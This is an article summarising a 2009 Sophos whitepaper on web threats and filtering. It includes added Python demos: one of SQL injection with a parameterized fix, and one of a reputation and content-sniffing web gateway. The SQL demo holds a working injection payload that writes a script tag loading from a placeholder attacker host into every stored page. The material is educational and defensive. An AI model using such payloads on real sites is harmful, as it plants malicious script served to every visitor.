Enabling a safer internet: A positive approach to web security

03 Jun 09

IT security and control firm Sophos released a whitepaper that describes today’s new web threats and highlights the need for a positive security model to replace yesterday’s access-blocking approach. The paper suggests three pillars of protection organizations need to safeguard their systems and resources.

With one new web page infected every 4.5 seconds, the web is now the number one vector of attack for cyber criminals, according to the paper. As the internet becomes an increasingly mission-critical tool, new media such as blogs and social networking sites are becoming a necessary part of business.

Taking advantage of web infrastructure vulnerabilities, particularly the ever-increasing capability for user-submitted content, hackers are able to covertly inject malicious code into more and more legitimate sites.

This web-based malware is then able to exploit social engineering tactics or browser vulnerabilities to infect visitors, the intention being to surreptitiously steal confidential information directly, install further malicious code or, worse, silently recruit the host system into a botnet – a network of hijacked computers for distributing further malware, spyware, or spam.

One of the main threats comes from SQL injection attacks. Where user input, for instance from a web form or a URL parameter, is not correctly validated before being placed into a database query, an attacker can append their own SQL statements to it. In the attacks the paper describes, those statements write script tags into the content stored in the site’s database, so that every page the site subsequently renders carries the attacker’s script and serves it to each visitor.
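As an added illustration (not taken from the Sophos paper or this article), the following Python program reproduces the mechanism against an in-memory SQLite database: a hypothetical page-view counter splices a request parameter into its SQL text, the injected statement tags every stored page body with an external script, and the parameterized version rejects the same input. The CMS schema, the payload and the attacker.invalid domain are all constructed for the example.

```python
import sqlite3

# Constructed sample: a minimal CMS whose page bodies are stored in the database
# and rendered verbatim to every visitor (the schema and content are hypothetical).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE pages (
            id INTEGER PRIMARY KEY, title TEXT, body TEXT, views INTEGER NOT NULL DEFAULT 0
        );
        INSERT INTO pages (id, title, body) VALUES (1, 'Home', '<p>Welcome</p>');
        INSERT INTO pages (id, title, body) VALUES (2, 'About', '<p>About us</p>');
    """)
    return conn

# Hypothetical attacker input for the page-id parameter. It terminates the intended
# statement and appends an UPDATE that tags every stored page with a script loaded
# from a server the attacker controls (placeholder domain).
PAYLOAD = ("1; UPDATE pages SET body = body || "
           "'<script src=\"http://attacker.invalid/x.js\"></script>' WHERE 1=1")

def record_view_vulnerable(conn, page_id):
    # BAD: the raw parameter is spliced into the SQL text, and executescript runs
    # every statement in the string (as a database batch interface would), so the
    # injected UPDATE executes with the application's database privileges.
    conn.executescript("UPDATE pages SET views = views + 1 WHERE id = %s" % page_id)

def record_view_safe(conn, page_id):
    # GOOD: reject anything that is not an integer, then bind the value as a
    # parameter so the driver never interprets it as SQL.
    pid = int(page_id)                       # raises ValueError for PAYLOAD
    conn.execute("UPDATE pages SET views = views + 1 WHERE id = ?", (pid,))

def infected_pages(conn):
    """IDs of pages whose body now carries a script tag, i.e. what every visitor will receive."""
    rows = conn.execute("SELECT id FROM pages WHERE body LIKE '%<script%' ORDER BY id")
    return [r[0] for r in rows]

def page_views(conn, page_id):
    return conn.execute("SELECT views FROM pages WHERE id = ?", (page_id,)).fetchone()[0]

if __name__ == "__main__":
    db = make_db()
    record_view_vulnerable(db, PAYLOAD)
    print("pages carrying injected script:", infected_pages(db))   # [1, 2]
```

The safe version does two things the vulnerable one does not: it rejects input that is not the expected type before any SQL is built, and it passes the value as a bound parameter rather than as part of the statement text. Either alone helps; together they leave nothing for the database to parse as attacker-supplied SQL.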

Social networking sites

A favourite target for today’s hackers is social networking websites. People who have learned to be suspicious of email links are on the whole less savvy about links posted on Facebook and the like. Hackers have found value in compromising Facebook accounts, stealing usernames and passwords, and then using the profiles as a launching pad for mass-distributing malware attacks and spam.

One particularly active threat is Koobface, a family of worms, and its rapid evolution demonstrates the wide range of social networks that are vulnerable. Initially targeting Facebook and MySpace, Koobface now targets a more diverse set of social networks, including MySpace, Bebo, hi5, GeoCities, Friendster and Tagged.

Blogs, micro-blogs and hackers

Hackers are also targeting other social media such as blogs. In much the same way that they set up malicious pages on fake websites and then use social engineering techniques to lure visitors to them, they are using free blogging services to create infected blogs. Unsuspecting victims then receive emails with links to the blog, from which malicious software is downloaded.

At the same time, vulnerabilities in common legitimate blogging platforms – just like any other platform – can be, and are, exploited by criminals. Of note is the micro-blogging site, Twitter, which has begun to be targeted. In January 2009, Twitter’s internal systems were hacked and the accounts of Britney Spears, Fox News and Barack Obama, among others, were broken into. Two months later hundreds of Twitter users were hit when messages were sent from compromised accounts trying to drive traffic to a pornographic website.

The spread of the phishing net

Phishing attacks – whereby unsuspecting users are directed to a bogus login page, which requests their username and password – continue to be a significant threat.

The risks posed by anonymizing proxies

Many organizations have responded to the growing web threat by using URL filtering to curtail Internet browsing. This has motivated many users to respond by using anonymizing proxies, which fetch the destination page on the user’s behalf so that the organization’s web filter sees only the proxy’s address, not the blocked site, and allows the request through.

Anonymizing proxies are big business in the underground economy, driven by advertising revenues and subscription fees. Hundreds of new anonymizing proxies are created daily and distributed via blogs, forums, and dedicated websites.

The three pillars of modern web protection

A new approach to web security and control is required that fully supports the needs of business, equipping users with the tools they need to be more effective while eliminating the risk of infection from compromised but otherwise trusted sites. In addition to good preventive practices, such as rigorous patching and educating users about the risks of browsing, it is vital that organizations implement a comprehensive web security solution, comprising three key pillars of protection:

• Reputation-based filtering

• Real-time predictive malware filtering

• Content-based filtering.

Pillar One

Reputation-based filtering

Reputation-based filters are the first critical component in the fight against web-based threats.

They prevent access to a catalog of sites that are known to have hosted malware or other unwanted content, by filtering URLs based on their reputation as “good” or “bad”, and are an established and proven tool for successfully protecting against already known and located web-based threats. As well as providing this basic form of preventive protection, they help optimize network performance and staff productivity by blocking access to illegal, inappropriate, or nonbusiness-critical web content.

Although traditional URL filters often connect to vast, regularly updated databases of sites known to host malware or suspicious content, they have several significant shortcomings. In particular, they offer no protection against malware hosted on legitimate, previously safe, sites that have become hijacked. Neither do they protect against malware on newly created websites.

Pillar Two

Real-time predictive malware filtering

Real-time predictive malware filtering goes a long way to closing the gap left by reputation-based filters. All web traffic passes through a scanner designed to identify both known and newly emerging zero-day malware. The malware engine is optimized for low-latency scanning and whenever a user accesses a website, irrespective of its reputation or category, the traffic is scanned using a combination of signatures and behavior-based technologies.

The use of real-time predictive threat filtering remains uncommon amongst many of the leading web filtering security solutions in the market today. Many security vendors are currently relying on signatures alone. Others who are fairly recent entrants to the market claim comprehensive solutions but lack the evidence to prove they are delivering fully proactive protection.

Pillar Three

Content-based filtering

Content-based filtering analyzes all web traffic on the network to determine the true filetype of content coming back from a website and can allow or disallow this traffic, based on corporate policy.

Content filters scan the actual content of a file, rather than simply looking at the file extension or the MIME-type reported by the web server, and so can identify and block files that are masquerading as innocent/allowed file types but really contain unauthorized content. A file might, for example, have a .TXT extension but in fact be an executable file.
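An added example, written for this page rather than taken from the Sophos paper, that puts pillar one and pillar three side by side. The reputation check matches a host or any parent domain against a blocklist; the content check reads the leading bytes of the response to establish its true type and blocks executables, files whose content contradicts their extension, and files whose content contradicts the server’s Content-Type header. The blocklist, the host names, the magic-byte table and the PE-like stub are all constructed for the example; the case that matters is a trusted site, unknown to the blocklist, serving an executable under a .TXT name, which only the content check catches.

```python
import os
from urllib.parse import urlsplit

# --- Pillar one: reputation lookup. The blocklist is a constructed stand-in for a vendor feed. ---
BAD_HOSTS = {"malware-host.invalid", "phish-login.invalid"}

def host_reputation(url):
    """'bad' if the host or any parent domain is listed, otherwise 'unknown' (which is not 'safe')."""
    host = (urlsplit(url).hostname or "").rstrip(".").lower()
    labels = host.split(".")
    for i in range(len(labels)):
        if ".".join(labels[i:]) in BAD_HOSTS:
            return "bad"
    return "unknown"

# --- Pillar three: the true type comes from the leading bytes, not the extension or Content-Type. ---
MAGIC = [
    (b"MZ", "application/x-dosexec"),          # Windows PE / DOS executable
    (b"\x7fELF", "application/x-executable"),  # ELF binary
    (b"%PDF-", "application/pdf"),
    (b"PK\x03\x04", "application/zip"),        # also docx/xlsx/jar containers
    (b"\x89PNG\r\n\x1a\n", "image/png"),
    (b"\xff\xd8\xff", "image/jpeg"),
    (b"GIF87a", "image/gif"),
    (b"GIF89a", "image/gif"),
]
BLOCKED_TYPES = {"application/x-dosexec", "application/x-executable"}
EXPECTED_BY_EXT = {
    ".txt": {"text/plain"}, ".pdf": {"application/pdf"}, ".zip": {"application/zip"},
    ".png": {"image/png"}, ".jpg": {"image/jpeg"}, ".jpeg": {"image/jpeg"}, ".gif": {"image/gif"},
}

def sniff(body):
    """Best-effort true type of a response body from its first 512 bytes."""
    head = body[:512]
    for magic, mime in MAGIC:
        if head.startswith(magic):
            return mime
    if head and b"\x00" not in head:
        try:
            head.decode("utf-8")
            return "text/plain"
        except UnicodeDecodeError:
            pass
    return "application/octet-stream"

def gateway_decision(url, declared_mime, body):
    """Apply both pillars to one response. Returns (verdict, detail)."""
    if host_reputation(url) == "bad":
        return ("block", "host on reputation blocklist")
    true_type = sniff(body)
    if true_type in BLOCKED_TYPES:
        return ("block", "executable content (%s)" % true_type)
    ext = os.path.splitext(urlsplit(url).path)[1].lower()
    expected = EXPECTED_BY_EXT.get(ext)
    if expected and true_type not in expected:
        return ("block", "%s content served with %s extension" % (true_type, ext))
    declared = declared_mime.split(";")[0].strip().lower()
    if declared and declared != true_type:
        return ("block", "%s content declared as %s" % (true_type, declared))
    return ("allow", true_type)

# Constructed sample: a PE-like stub (not a real binary) served by a hijacked site the blocklist does not know.
PE_STUB = b"MZ\x90\x00\x03\x00\x00\x00" + b"\x00" * 56 + b"PE\x00\x00"

if __name__ == "__main__":
    print(gateway_decision("http://www.trusted-news.example/notes.txt", "text/plain", PE_STUB))
```

Note that the reputation result for the hijacked site is "unknown", not "good"; a gateway that treats an absent blocklist entry as permission to skip the content check has exactly the blind spot described under pillar one.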

Conclusion

Every minute of every day, cybercriminals are looking to exploit web traffic for commercial gain, and since web browsing is integral to most businesses’ day-to-day activities, the web gateway must be equipped with a security solution that enables business and users to be productive while providing the security essential to ensure a risk-free experience.

Organizations looking to protect against the growing threat of web-based malware need a solution that above all demonstrates its security attributes and combines powerful site and content controls with low-impact, effective administration.

At the same time end-user expectations and requirements for speed, efficiency, and open access to the tools and sites they need must be met. Solutions which fail to meet these demands for security, control, performance, and accessibility will ultimately fail the organization.
